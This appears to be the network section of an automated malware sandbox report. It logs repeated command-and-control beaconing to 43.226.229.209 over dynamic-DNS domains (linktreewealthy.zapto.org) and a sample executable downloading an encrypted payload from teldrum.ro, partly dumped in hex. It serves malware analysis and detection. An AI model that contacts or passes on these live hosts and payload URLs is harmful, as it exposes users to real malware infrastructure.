Jan 14, 2025 15:43:42.221343994 CET	50020	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:42.226958036 CET	50020	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:42.231712103 CET	3981	50020	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:43.560110092 CET	3981	50020	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:43.560204983 CET	50020	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:43.560641050 CET	50020	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:43.565619946 CET	3981	50020	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:44.585750103 CET	50021	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:44.591145039 CET	3980	50021	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:44.591273069 CET	50021	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:44.593686104 CET	50021	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:44.598969936 CET	3980	50021	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:45.906280994 CET	3980	50021	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:45.906383991 CET	50021	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:45.906564951 CET	50021	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:45.908406973 CET	50022	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:45.911459923 CET	3980	50021	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:45.913290024 CET	3981	50022	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:45.913491964 CET	50022	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:45.917767048 CET	50022	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:45.922542095 CET	3981	50022	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:47.316090107 CET	3981	50022	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:47.316159010 CET	50022	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:47.316557884 CET	50022	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:47.321361065 CET	3981	50022	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:48.319335938 CET	50023	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:48.325059891 CET	3980	50023	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:48.325176001 CET	50023	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:48.327338934 CET	50023	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:48.332932949 CET	3980	50023	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:49.635440111 CET	3980	50023	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:49.635551929 CET	50023	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:49.635643959 CET	50023	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:49.637226105 CET	50024	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:49.640389919 CET	3980	50023	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:49.642047882 CET	3981	50024	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:49.642211914 CET	50024	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:49.646553040 CET	50024	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:49.651293993 CET	3981	50024	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:51.006272078 CET	3981	50024	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:51.006361008 CET	50024	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:51.006761074 CET	50024	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:51.011548042 CET	3981	50024	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:52.022948027 CET	50025	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:52.027945995 CET	3980	50025	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:52.028059006 CET	50025	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:52.028882980 CET	50025	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:52.033781052 CET	3980	50025	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:53.341420889 CET	3980	50025	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:53.341537952 CET	50025	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:53.341669083 CET	50025	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:53.345006943 CET	50026	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:53.346401930 CET	3980	50025	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:53.349776983 CET	3981	50026	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:53.349906921 CET	50026	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:53.354360104 CET	50026	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:53.359319925 CET	3981	50026	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:54.684520006 CET	3981	50026	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:54.684683084 CET	50026	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:54.685151100 CET	50026	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:54.690875053 CET	3981	50026	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:55.694540024 CET	50027	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:55.699361086 CET	3980	50027	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:55.699434042 CET	50027	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:55.700248003 CET	50027	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:55.705091953 CET	3980	50027	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:57.022428036 CET	3980	50027	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:57.022504091 CET	50027	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:57.022651911 CET	50027	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:57.024315119 CET	50028	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:57.027477980 CET	3980	50027	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:57.029704094 CET	3981	50028	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:57.029777050 CET	50028	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:57.034301043 CET	50028	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:57.039108992 CET	3981	50028	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:58.413055897 CET	3981	50028	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:58.413124084 CET	50028	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:58.413690090 CET	50028	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:58.418687105 CET	3981	50028	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:59.444809914 CET	50029	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:59.449702978 CET	3980	50029	43.226.229.209	192.168.2.5
Jan 14, 2025 15:43:59.449858904 CET	50029	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:59.450331926 CET	50029	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:43:59.455415010 CET	3980	50029	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:00.814275980 CET	3980	50029	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:00.814369917 CET	50029	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:00.814471960 CET	50029	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:00.815893888 CET	50030	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:00.819283009 CET	3980	50029	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:00.820871115 CET	3981	50030	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:00.820956945 CET	50030	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:00.825330019 CET	50030	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:00.830116034 CET	3981	50030	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:02.141468048 CET	3981	50030	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:02.141532898 CET	50030	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:02.142611980 CET	50030	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:02.147443056 CET	3981	50030	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:03.369297981 CET	50031	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:03.374193907 CET	3980	50031	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:03.377470970 CET	50031	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:03.378072977 CET	50031	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:03.382863998 CET	3980	50031	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:04.725056887 CET	3980	50031	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:04.726032019 CET	50031	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:04.726121902 CET	50031	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:04.727555990 CET	50032	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:04.730931044 CET	3980	50031	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:04.732391119 CET	3981	50032	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:04.732515097 CET	50032	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:04.736651897 CET	50032	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:04.741445065 CET	3981	50032	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:06.061364889 CET	3981	50032	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:06.062993050 CET	50032	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:09.257860899 CET	50032	3981	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:09.262907028 CET	3981	50032	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:10.288573980 CET	50033	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:10.293476105 CET	3980	50033	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:10.293622017 CET	50033	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:10.294477940 CET	50033	3980	192.168.2.5	43.226.229.209
Jan 14, 2025 15:44:10.299442053 CET	3980	50033	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:11.612766981 CET	3980	50033	43.226.229.209	192.168.2.5
Jan 14, 2025 15:44:11.612868071 CET	50033	3980	192.168.2.5	43.226.229.209

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 15:42:19.692228079 CET	55198	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:19.764045954 CET	53	55198	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:27.035768032 CET	58803	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:27.044796944 CET	53	58803	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:29.700495958 CET	57140	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:29.716342926 CET	53	57140	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:37.053982973 CET	50988	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:37.063736916 CET	53	50988	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:44.542865992 CET	54859	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:44.551646948 CET	53	54859	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:51.902858019 CET	52263	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:51.913228989 CET	53	52263	1.1.1.1	192.168.2.5
Jan 14, 2025 15:42:59.284748077 CET	59017	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:42:59.293608904 CET	53	59017	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:06.668732882 CET	51249	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:06.677172899 CET	53	51249	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:14.001919985 CET	62031	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:14.010696888 CET	53	62031	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:21.415873051 CET	58346	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:21.423449039 CET	53	58346	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:27.441461086 CET	50633	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:27.450603008 CET	53	50633	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:28.781955004 CET	51044	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:28.790777922 CET	53	51044	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:36.190469980 CET	58232	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:36.199757099 CET	53	58232	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:43.562196970 CET	52989	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:43.571626902 CET	53	52989	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:51.007769108 CET	59873	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:51.018682957 CET	53	59873	1.1.1.1	192.168.2.5
Jan 14, 2025 15:43:58.414611101 CET	63085	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:43:58.431173086 CET	53	63085	1.1.1.1	192.168.2.5
Jan 14, 2025 15:44:09.259247065 CET	61555	53	192.168.2.5	1.1.1.1
Jan 14, 2025 15:44:09.275396109 CET	53	61555	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 15:42:19.692228079 CET	192.168.2.5	1.1.1.1	0xd056	Standard query (0)	teldrum.ro	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:27.035768032 CET	192.168.2.5	1.1.1.1	0xf00	Standard query (0)	linktreewealth.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:29.700495958 CET	192.168.2.5	1.1.1.1	0x7590	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:37.053982973 CET	192.168.2.5	1.1.1.1	0xcca	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:44.542865992 CET	192.168.2.5	1.1.1.1	0xbaf7	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:51.902858019 CET	192.168.2.5	1.1.1.1	0xb42d	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:59.284748077 CET	192.168.2.5	1.1.1.1	0xaa4c	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:06.668732882 CET	192.168.2.5	1.1.1.1	0x106e	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:14.001919985 CET	192.168.2.5	1.1.1.1	0xf5d8	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:21.415873051 CET	192.168.2.5	1.1.1.1	0x2502	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:27.441461086 CET	192.168.2.5	1.1.1.1	0x7ac1	Standard query (0)	linktreewealth.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:28.781955004 CET	192.168.2.5	1.1.1.1	0xadf	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:36.190469980 CET	192.168.2.5	1.1.1.1	0x9ea5	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:43.562196970 CET	192.168.2.5	1.1.1.1	0x3ba8	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:51.007769108 CET	192.168.2.5	1.1.1.1	0x4798	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:58.414611101 CET	192.168.2.5	1.1.1.1	0x5109	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:44:09.259247065 CET	192.168.2.5	1.1.1.1	0x5c5a	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 15:42:19.764045954 CET	1.1.1.1	192.168.2.5	0xd056	No error (0)	teldrum.ro	109.99.162.14	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:42:27.044796944 CET	1.1.1.1	192.168.2.5	0xf00	No error (0)	linktreewealth.zapto.org	43.226.229.209	A (IP address)	IN (0x0001)	false
Jan 14, 2025 15:43:27.450603008 CET	1.1.1.1	192.168.2.5	0x7ac1	No error (0)	linktreewealth.zapto.org	43.226.229.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

teldrum.ro

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49978	109.99.162.14	443	5064	C:\Users\user\Desktop\x6yDsHJ9tr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 14:42:20 UTC	173	OUT	GET /NJrdZqNcCtz102.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: teldrum.ro Cache-Control: no-cache
2025-01-14 14:42:21 UTC	223	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 14:42:21 GMT Server: Apache Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT Accept-Ranges: bytes Content-Length: 493632 Connection: close Content-Type: application/octet-stream
2025-01-14 14:42:21 UTC	7969	IN	Data Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1 Data Ascii: \|ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?\|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64 Data Ascii: sC#up:{k\|Y-NlQu,tYTr :}o@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^d
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1 Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e\|7zKiM<q]e3\|PtaxQo[-.gqr6@52wto;k("A%k(N'd
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09 Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#\|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7 Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p\|sX.ggW3G11LQdJv !8t
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f Data Ascii: =;wA5F\'#4cg?8/]6S2(+p?9Kr}.z%:$)zuD#U"821`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
